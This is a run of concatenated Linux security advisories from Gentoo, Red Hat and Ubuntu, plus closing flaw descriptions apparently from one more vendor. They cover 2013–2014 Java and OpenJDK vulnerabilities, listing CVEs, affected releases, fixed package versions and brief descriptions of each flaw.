http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2473 [ 177 ] CVE-2013-3829 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3829 [ 178 ] CVE-2013-4002 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4002 [ 179 ] CVE-2013-5772 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5772 [ 180 ] CVE-2013-5774 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5774 [ 181 ] CVE-2013-5778 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5778 [ 182 ] CVE-2013-5780 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5780 [ 183 ] CVE-2013-5782 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5782 [ 184 ] CVE-2013-5783 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5783 [ 185 ] CVE-2013-5784 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5784 [ 186 ] CVE-2013-5790 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5790 [ 187 ] CVE-2013-5797 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5797 [ 188 ] CVE-2013-5800 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5800 [ 189 ] CVE-2013-5802 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5802 [ 190 ] CVE-2013-5803 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5803 [ 191 ] CVE-2013-5804 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5804 [ 192 ] CVE-2013-5805 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5805 [ 193 ] CVE-2013-5806 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5806 [ 194 ] CVE-2013-5809 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5809 [ 195 ] CVE-2013-5814 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5814 [ 196 ] CVE-2013-5817 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5817 [ 197 ] CVE-2013-5820 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5820 [ 198 ] CVE-2013-5823 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5823 [ 199 ] CVE-2013-5825 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5825 [ 200 ] CVE-2013-5829 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5829 [ 201 ] CVE-2013-5830 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5830 [ 202 ] CVE-2013-5840 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5840 [ 203 ] CVE-2013-5842 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5842 [ 204 ] CVE-2013-5849 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5849 [ 205 ] CVE-2013-5850 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5850 [ 206 ] CVE-2013-5851 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5851 [ 207 ] CVE-2013-6629 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6629 [ 208 ] CVE-2013-6954 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6954 [ 209 ] CVE-2014-0429 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0429 [ 210 ] CVE-2014-0446 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0446 [ 211 ] CVE-2014-0451 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0451 [ 212 ] CVE-2014-0452 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0452 [ 213 ] CVE-2014-0453 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0453 [ 214 ] CVE-2014-0456 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0456 [ 215 ] CVE-2014-0457 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0457 [ 216 ] CVE-2014-0458 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0458 [ 217 ] CVE-2014-0459 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0459 [ 218 ] CVE-2014-0460 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0460 [ 219 ] CVE-2014-0461 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0461 [ 220 ] CVE-2014-1876 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1876 [ 221 ] CVE-2014-2397 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2397 [ 222 ] CVE-2014-2398 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2398 [ 223 ] CVE-2014-2403 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2403 [ 224 ] CVE-2014-2412 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2412 [ 225 ] CVE-2014-2414 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2414 [ 226 ] CVE-2014-2421 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2421 [ 227 ] CVE-2014-2423 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2423 [ 228 ] CVE-2014-2427 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2427
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201406-32.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Critical: java-1.6.0-ibm security update Advisory ID: RHSA-2013:0823-01 Product: Red Hat Enterprise Linux Supplementary Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-0823.html Issue date: 2013-05-14 CVE Names: CVE-2013-0169 CVE-2013-0401 CVE-2013-1491 CVE-2013-1537 CVE-2013-1540 CVE-2013-1557 CVE-2013-1563 CVE-2013-1569 CVE-2013-2383 CVE-2013-2384 CVE-2013-2394 CVE-2013-2417 CVE-2013-2418 CVE-2013-2419 CVE-2013-2420 CVE-2013-2422 CVE-2013-2424 CVE-2013-2429 CVE-2013-2430 CVE-2013-2432 CVE-2013-2433 CVE-2013-2435 CVE-2013-2440 =====================================================================
- Summary:
Updated java-1.6.0-ibm packages that fix several security issues are now available for Red Hat Enterprise Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node Supplementary (v. 6) - x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, ppc, s390x, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
- Detailed vulnerability descriptions are linked from the IBM Security alerts page, listed in the References section. (CVE-2013-0169, CVE-2013-0401, CVE-2013-1491, CVE-2013-1537, CVE-2013-1540, CVE-2013-1557, CVE-2013-1563, CVE-2013-1569, CVE-2013-2383, CVE-2013-2384, CVE-2013-2394, CVE-2013-2417, CVE-2013-2418, CVE-2013-2419, CVE-2013-2420, CVE-2013-2422, CVE-2013-2424, CVE-2013-2429, CVE-2013-2430, CVE-2013-2432, CVE-2013-2433, CVE-2013-2435, CVE-2013-2440)
All users of java-1.6.0-ibm are advised to upgrade to these updated packages, containing the IBM Java SE 6 SR13-FP2 release. All running instances of IBM Java must be restarted for the update to take effect.
- Solution:
Before applying this update, make sure all previously-released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/knowledge/articles/11258
- Bugs fixed (http://bugzilla.redhat.com/):
907589 - CVE-2013-0169 SSL/TLS: CBC padding timing attack (lucky-13) 920245 - CVE-2013-0401 OpenJDK: sun.awt.datatransfer.ClassLoaderObjectInputStream class may incorrectly invoke the system class loader (CanSecWest 2013, AWT, 8009305) 920248 - CVE-2013-1491 Oracle JDK: unspecified sanbox bypass (CanSecWest 2013, 2D) 952387 - CVE-2013-1537 OpenJDK: remote code loading enabled by default (RMI, 8001040) 952509 - CVE-2013-2424 OpenJDK: MBeanInstantiator insufficient class access checks (JMX, 8006435) 952521 - CVE-2013-2429 OpenJDK: JPEGImageWriter state corruption (ImageIO, 8007918) 952524 - CVE-2013-2430 OpenJDK: JPEGImageReader state corruption (ImageIO, 8007667) 952638 - CVE-2013-2420 OpenJDK: image processing vulnerability (2D, 8007617) 952642 - CVE-2013-2422 OpenJDK: MethodUtil trampoline class incorrect restrictions (Libraries, 8009857) 952648 - CVE-2013-1557 OpenJDK: LogStream.setDefaultStream() missing security restrictions (RMI, 8001329) 952656 - CVE-2013-2419 ICU: Layout Engine font processing errors (JDK 2D, 8001031) 952657 - CVE-2013-2417 OpenJDK: Network InetAddress serialization information disclosure (Networking, 8000724) 952708 - CVE-2013-2383 ICU: Layout Engine font layout and glyph table errors (JDK 2D, 8004986) 952709 - CVE-2013-2384 ICU: Layout Engine font layout and glyph table errors (JDK 2D, 8004987) 952711 - CVE-2013-1569 ICU: Layout Engine font layout and glyph table errors (JDK 2D, 8004994) 953166 - CVE-2013-1540 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Deployment) 953172 - CVE-2013-1563 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Install) 953265 - CVE-2013-2394 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (2D) 953267 - CVE-2013-2418 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Deployment) 953269 - CVE-2013-2432 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (2D) 953270 - CVE-2013-2433 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Deployment) 953273 - CVE-2013-2435 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Deployment) 953275 - CVE-2013-2440 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Deployment)
- Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386: java-1.6.0-ibm-1.6.0.13.2-1jpp.1.el5_9.i386.rpm java-1.6.0-ibm-accessibility-1.6.0.13.2-1jpp.1.el5_9.i386.rpm java-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el5_9.i386.rpm java-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el5_9.i386.rpm java-1.6.0-ibm-javacomm-1.6.0.13.2-1jpp.1.el5_9.i386.rpm java-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el5_9.i386.rpm java-1.6.0-ibm-plugin-1.6.0.13.2-1jpp.1.el5_9.i386.rpm java-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el5_9.i386.rpm
x86_64: java-1.6.0-ibm-1.6.0.13.2-1jpp.1.el5_9.i386.rpm java-1.6.0-ibm-1.6.0.13.2-1jpp.1.el5_9.x86_64.rpm java-1.6.0-ibm-accessibility-1.6.0.13.2-1jpp.1.el5_9.x86_64.rpm java-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el5_9.i386.rpm java-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el5_9.x86_64.rpm java-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el5_9.i386.rpm java-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el5_9.x86_64.rpm java-1.6.0-ibm-javacomm-1.6.0.13.2-1jpp.1.el5_9.i386.rpm java-1.6.0-ibm-javacomm-1.6.0.13.2-1jpp.1.el5_9.x86_64.rpm java-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el5_9.i386.rpm java-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el5_9.x86_64.rpm java-1.6.0-ibm-plugin-1.6.0.13.2-1jpp.1.el5_9.i386.rpm java-1.6.0-ibm-plugin-1.6.0.13.2-1jpp.1.el5_9.x86_64.rpm java-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el5_9.i386.rpm java-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el5_9.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386: java-1.6.0-ibm-1.6.0.13.2-1jpp.1.el5_9.i386.rpm java-1.6.0-ibm-accessibility-1.6.0.13.2-1jpp.1.el5_9.i386.rpm java-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el5_9.i386.rpm java-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el5_9.i386.rpm java-1.6.0-ibm-javacomm-1.6.0.13.2-1jpp.1.el5_9.i386.rpm java-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el5_9.i386.rpm java-1.6.0-ibm-plugin-1.6.0.13.2-1jpp.1.el5_9.i386.rpm java-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el5_9.i386.rpm
ppc: java-1.6.0-ibm-1.6.0.13.2-1jpp.1.el5_9.ppc.rpm java-1.6.0-ibm-1.6.0.13.2-1jpp.1.el5_9.ppc64.rpm java-1.6.0-ibm-accessibility-1.6.0.13.2-1jpp.1.el5_9.ppc.rpm java-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el5_9.ppc.rpm java-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el5_9.ppc64.rpm java-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el5_9.ppc.rpm java-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el5_9.ppc64.rpm java-1.6.0-ibm-javacomm-1.6.0.13.2-1jpp.1.el5_9.ppc.rpm java-1.6.0-ibm-javacomm-1.6.0.13.2-1jpp.1.el5_9.ppc64.rpm java-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el5_9.ppc.rpm java-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el5_9.ppc64.rpm java-1.6.0-ibm-plugin-1.6.0.13.2-1jpp.1.el5_9.ppc.rpm java-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el5_9.ppc.rpm java-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el5_9.ppc64.rpm
s390x: java-1.6.0-ibm-1.6.0.13.2-1jpp.1.el5_9.s390.rpm java-1.6.0-ibm-1.6.0.13.2-1jpp.1.el5_9.s390x.rpm java-1.6.0-ibm-accessibility-1.6.0.13.2-1jpp.1.el5_9.s390x.rpm java-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el5_9.s390.rpm java-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el5_9.s390x.rpm java-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el5_9.s390.rpm java-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el5_9.s390x.rpm java-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el5_9.s390.rpm java-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el5_9.s390x.rpm java-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el5_9.s390.rpm java-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el5_9.s390x.rpm
x86_64: java-1.6.0-ibm-1.6.0.13.2-1jpp.1.el5_9.i386.rpm java-1.6.0-ibm-1.6.0.13.2-1jpp.1.el5_9.x86_64.rpm java-1.6.0-ibm-accessibility-1.6.0.13.2-1jpp.1.el5_9.x86_64.rpm java-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el5_9.i386.rpm java-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el5_9.x86_64.rpm java-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el5_9.i386.rpm java-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el5_9.x86_64.rpm java-1.6.0-ibm-javacomm-1.6.0.13.2-1jpp.1.el5_9.i386.rpm java-1.6.0-ibm-javacomm-1.6.0.13.2-1jpp.1.el5_9.x86_64.rpm java-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el5_9.i386.rpm java-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el5_9.x86_64.rpm java-1.6.0-ibm-plugin-1.6.0.13.2-1jpp.1.el5_9.i386.rpm java-1.6.0-ibm-plugin-1.6.0.13.2-1jpp.1.el5_9.x86_64.rpm java-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el5_9.i386.rpm java-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el5_9.x86_64.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386: java-1.6.0-ibm-1.6.0.13.2-1jpp.1.el6_4.i686.rpm java-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el6_4.i686.rpm java-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el6_4.i686.rpm java-1.6.0-ibm-javacomm-1.6.0.13.2-1jpp.1.el6_4.i686.rpm java-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el6_4.i686.rpm java-1.6.0-ibm-plugin-1.6.0.13.2-1jpp.1.el6_4.i686.rpm java-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el6_4.i686.rpm
x86_64: java-1.6.0-ibm-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm java-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm java-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el6_4.i686.rpm java-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm java-1.6.0-ibm-javacomm-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm java-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm java-1.6.0-ibm-plugin-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm java-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm
Red Hat Enterprise Linux HPC Node Supplementary (v. 6):
x86_64: java-1.6.0-ibm-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm java-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm java-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el6_4.i686.rpm java-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm java-1.6.0-ibm-javacomm-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm java-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386: java-1.6.0-ibm-1.6.0.13.2-1jpp.1.el6_4.i686.rpm java-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el6_4.i686.rpm java-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el6_4.i686.rpm java-1.6.0-ibm-javacomm-1.6.0.13.2-1jpp.1.el6_4.i686.rpm java-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el6_4.i686.rpm java-1.6.0-ibm-plugin-1.6.0.13.2-1jpp.1.el6_4.i686.rpm java-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el6_4.i686.rpm
ppc64: java-1.6.0-ibm-1.6.0.13.2-1jpp.1.el6_4.ppc64.rpm java-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el6_4.ppc64.rpm java-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el6_4.ppc.rpm java-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el6_4.ppc64.rpm java-1.6.0-ibm-javacomm-1.6.0.13.2-1jpp.1.el6_4.ppc64.rpm java-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el6_4.ppc64.rpm java-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el6_4.ppc64.rpm
s390x: java-1.6.0-ibm-1.6.0.13.2-1jpp.1.el6_4.s390x.rpm java-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el6_4.s390x.rpm java-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el6_4.s390.rpm java-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el6_4.s390x.rpm java-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el6_4.s390x.rpm java-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el6_4.s390x.rpm
x86_64: java-1.6.0-ibm-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm java-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm java-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el6_4.i686.rpm java-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm java-1.6.0-ibm-javacomm-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm java-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm java-1.6.0-ibm-plugin-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm java-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386: java-1.6.0-ibm-1.6.0.13.2-1jpp.1.el6_4.i686.rpm java-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el6_4.i686.rpm java-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el6_4.i686.rpm java-1.6.0-ibm-javacomm-1.6.0.13.2-1jpp.1.el6_4.i686.rpm java-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el6_4.i686.rpm java-1.6.0-ibm-plugin-1.6.0.13.2-1jpp.1.el6_4.i686.rpm java-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el6_4.i686.rpm
x86_64: java-1.6.0-ibm-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm java-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm java-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el6_4.i686.rpm java-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm java-1.6.0-ibm-javacomm-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm java-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm java-1.6.0-ibm-plugin-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm java-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2013-0169.html https://www.redhat.com/security/data/cve/CVE-2013-0401.html https://www.redhat.com/security/data/cve/CVE-2013-1491.html https://www.redhat.com/security/data/cve/CVE-2013-1537.html https://www.redhat.com/security/data/cve/CVE-2013-1540.html https://www.redhat.com/security/data/cve/CVE-2013-1557.html https://www.redhat.com/security/data/cve/CVE-2013-1563.html https://www.redhat.com/security/data/cve/CVE-2013-1569.html https://www.redhat.com/security/data/cve/CVE-2013-2383.html https://www.redhat.com/security/data/cve/CVE-2013-2384.html https://www.redhat.com/security/data/cve/CVE-2013-2394.html https://www.redhat.com/security/data/cve/CVE-2013-2417.html https://www.redhat.com/security/data/cve/CVE-2013-2418.html https://www.redhat.com/security/data/cve/CVE-2013-2419.html https://www.redhat.com/security/data/cve/CVE-2013-2420.html https://www.redhat.com/security/data/cve/CVE-2013-2422.html https://www.redhat.com/security/data/cve/CVE-2013-2424.html https://www.redhat.com/security/data/cve/CVE-2013-2429.html https://www.redhat.com/security/data/cve/CVE-2013-2430.html https://www.redhat.com/security/data/cve/CVE-2013-2432.html https://www.redhat.com/security/data/cve/CVE-2013-2433.html https://www.redhat.com/security/data/cve/CVE-2013-2435.html https://www.redhat.com/security/data/cve/CVE-2013-2440.html https://access.redhat.com/security/updates/classification/#critical https://www.ibm.com/developerworks/java/jdk/alerts/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2013 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFRkpsAXlSAg2UNWIIRArHgAJ99lN3GBaglvj3QTq7laft1RtttvQCgglIn I8ZMWd5AhLgB1TqY/4MQYM0= =wmpI -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . ========================================================================== Ubuntu Security Notice USN-1819-1 May 07, 2013
openjdk-6 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.04 LTS
- Ubuntu 11.10
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in OpenJDK 6.
Software Description: - openjdk-6: Open Source Java implementation
Details:
Ben Murphy discovered a vulnerability in the OpenJDK JRE related to information disclosure and data integrity. (CVE-2013-0401)
James Forshaw discovered a vulnerability in the OpenJDK JRE related to information disclosure, data integrity and availability. (CVE-2013-1488)
Several vulnerabilities were discovered in the OpenJDK JRE related to information disclosure, data integrity and availability. An attacker could exploit these to cause a denial of service or expose sensitive data over the network. (CVE-2013-1518, CVE-2013-1537, CVE-2013-1557, CVE-2013-1558, CVE-2013-1569, CVE-2013-2383, CVE-2013-2384, CVE-2013-2420, CVE-2013-2421, CVE-2013-2422, CVE-2013-2426, CVE-2013-2429, CVE-2013-2430, CVE-2013-2431, CVE-2013-2436)
Two vulnerabilities were discovered in the OpenJDK JRE related to confidentiality. An attacker could exploit these to expose sensitive data over the network. (CVE-2013-2415, CVE-2013-2424)
Two vulnerabilities were discovered in the OpenJDK JRE related to availability. An attacker could exploit these to cause a denial of service. (CVE-2013-2417, CVE-2013-2419)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 12.04 LTS: icedtea-6-jre-cacao 6b27-1.12.5-0ubuntu0.12.04.1 icedtea-6-jre-jamvm 6b27-1.12.5-0ubuntu0.12.04.1 openjdk-6-jre 6b27-1.12.5-0ubuntu0.12.04.1 openjdk-6-jre-headless 6b27-1.12.5-0ubuntu0.12.04.1 openjdk-6-jre-lib 6b27-1.12.5-0ubuntu0.12.04.1 openjdk-6-jre-zero 6b27-1.12.5-0ubuntu0.12.04.1
Ubuntu 11.10: icedtea-6-jre-cacao 6b27-1.12.5-0ubuntu0.11.10.1 icedtea-6-jre-jamvm 6b27-1.12.5-0ubuntu0.11.10.1 openjdk-6-jre 6b27-1.12.5-0ubuntu0.11.10.1 openjdk-6-jre-headless 6b27-1.12.5-0ubuntu0.11.10.1 openjdk-6-jre-lib 6b27-1.12.5-0ubuntu0.11.10.1 openjdk-6-jre-zero 6b27-1.12.5-0ubuntu0.11.10.1
Ubuntu 10.04 LTS: icedtea-6-jre-cacao 6b27-1.12.5-0ubuntu0.10.04.1 openjdk-6-jre 6b27-1.12.5-0ubuntu0.10.04.1 openjdk-6-jre-headless 6b27-1.12.5-0ubuntu0.10.04.1 openjdk-6-jre-lib 6b27-1.12.5-0ubuntu0.10.04.1 openjdk-6-jre-zero 6b27-1.12.5-0ubuntu0.10.04.1
This update uses a new upstream release, which includes additional bug fixes. After a standard system update you need to restart any Java applications or applets to make all the necessary changes. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption (CVE-2013-1569, CVE-2013-2383, CVE-2013-2384).
Multiple improper permission check issues were discovered in the Beans, Libraries, JAXP, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions (CVE-2013-2422, CVE-2013-1518, CVE-2013-1557).
The previous default value of the java.rmi.server.useCodebaseOnly property permitted the RMI implementation to automatically load classes from remotely specified locations. Note: The fix for CVE-2013-1537 changes the default value of the property to true, restricting class loading to the local CLASSPATH and locations specified in the java.rmi.server.codebase property.
The 2D component did not properly process certain images. An untrusted Java application or applet could possibly use this flaw to trigger Java Virtual Machine memory corruption (CVE-2013-2420).
It was discovered that the Hotspot component did not properly handle certain intrinsic frames, and did not correctly perform access checks and MethodHandle lookups. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions (CVE-2013-2431, CVE-2013-2421).
It was discovered that JPEGImageReader and JPEGImageWriter in the ImageIO component did not protect against modification of their state while performing certain native code operations. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption (CVE-2013-2429, CVE-2013-2430).
The JDBC driver manager could incorrectly call the toString() method in JDBC drivers, and the ConcurrentHashMap class could incorrectly call the defaultReadObject() method. An untrusted Java application or applet could possibly use these flaws to bypass Java sandbox restrictions (CVE-2013-1488, CVE-2013-2426).
The sun.awt.datatransfer.ClassLoaderObjectInputStream class may incorrectly invoke the system class loader. An untrusted Java application or applet could possibly use this flaw to bypass certain Java sandbox restrictions (CVE-2013-0401).
Flaws were discovered in the Network component's InetAddress serialization, and the 2D component's font handling. An untrusted Java application or applet could possibly use these flaws to crash the Java Virtual Machine (CVE-2013-2417, CVE-2013-2419).
The MBeanInstantiator class implementation in the OpenJDK JMX component did not properly check class access before creating new instances. An untrusted Java application or applet could use this flaw to create instances of non-public classes (CVE-2013-2424).
It was discovered that JAX-WS could possibly create temporary files with insecure permissions. A local attacker could use this flaw to access temporary files created by an application using JAX-WS (CVE-2013-2415).
The updated packages provides icedtea6-1.11.10 which is not vulnerable to these issues.
